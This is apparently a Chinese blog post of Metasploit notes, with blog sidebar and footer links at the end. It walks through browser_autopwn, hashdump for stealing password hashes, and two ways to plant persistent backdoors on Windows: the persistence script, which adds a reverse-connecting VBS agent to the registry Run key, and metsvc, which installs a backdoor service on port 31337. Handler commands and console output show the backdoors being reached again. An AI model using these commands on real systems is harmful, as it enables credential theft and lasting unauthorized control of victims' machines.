• search autopwn


    search autopwn

     
    use server/browser_autopwn
     
    show options
     
    set LHOST 
     
    set SRVPORT
     
    set URIPATH /
     
    show options
     
    修改 etter.conf 文件
    if you use ipchains
    if you use iptables
     
     
     
     
     
     
     
    得到sessions后
     
    run hashdump
     
    run persistence -X -i 5 -p 445 -r 192.168.1.106
     
     
    Metasploit之建立backdoor一二
     
    1.meterpreter自带脚本 
     
    方法1.run presistence 
     
    可以使用run presistence -h查看选项: 
     
    meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139 
    [*] Running Persistance Script 
    [*] Resource file for cleanup created at 
    /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc 
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 
     
    LPORT=443 
    [*] Persistent agent script is 609496 bytes long 
    [+] Persistent Script written to C:WINDOWSTEMPzvlYoXnVYFbR.vbs 
    [*] Executing script C:WINDOWSTEMPzvlYoXnVYFbR.vbs 
    [+] Agent executed with PID 3272 
    [*] Installing into autorun as HKCUSoftwareMicrosoftWindows 
    CurrentVersionRunFCBCUBtLrzFY 
    [+] Installed into autorun as HKCUSoftwareMicrosoftWindows 
     
    CurrentVersionRunFCBCUBtLrzFY
    可以看到添加启动是通过,添加注册表键值,启动的是vbs脚本的后门。 
     
    连接: 
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LHOST 192.168.1.139 
    LHOST => 192.168.1.139 
    msf  exploit(handler) > set LPORT 443 
    LPORT => 443 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler...
    默认没启动,目标机重启后,可以成功获得meterpreter shell 
     
    方法2.run metsvc 
     
    执行metsvc 脚本 
     
    meterpreter > run metsvc -A 
    [*] Creating a meterpreter service on port 31337 
    [*] Creating a temporary installation directory C:WINDOWSTEMP 
     
    kqaqtcsWhBTbO... 
    [*]  >> Uploading metsrv.dll... 
    [*]  >> Uploading metsvc-server.exe... 
    [*]  >> Uploading metsvc.exe... 
    [*] Starting the service... 
       * Installing service metsvc 
    * Starting service 
    Service metsvc successfully installed. 
     
    [*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...
    新建的服务,加自启动(映像名称metsvc.exe,服务metsvc ),连接到后门: 
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LPORT 31337 
    LPORT => 31337 
    msf  exploit(handler) > set RHOST 192.168.1.108 
    RHOST => 192.168.1.108 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler... 
     
    meterpreter >
    成功连接 
  • 相关阅读:
    2018-2019-1 20189206 《深入理解计算机系统》第二章学习笔记
    2018-2019-1 20189206 《Linux内核原理与分析》第四周作业
    2018-2019-1 20189206 《构建之法》第二章学习笔记
    2018-2019-1 20189206 《文献管理与信息分析》学习笔记
    2018-2019-1 20189206 《Linux内核原理与分析》第三周作业
    2018-2019-1 20189206 《构建之法》第一章学习笔记
    2018-2019-1 20189206 vim.c插件安装
    2018-2019-1 20189206 《文献管理与信息分析》快速浏览
    将文件转换为base64字符串,然后还原
    读取2007以上版本的excel(xslx格式)
  • 原文地址:https://www.cnblogs.com/journeyIT/p/8259946.html
Copyright © 2020-2023  润新知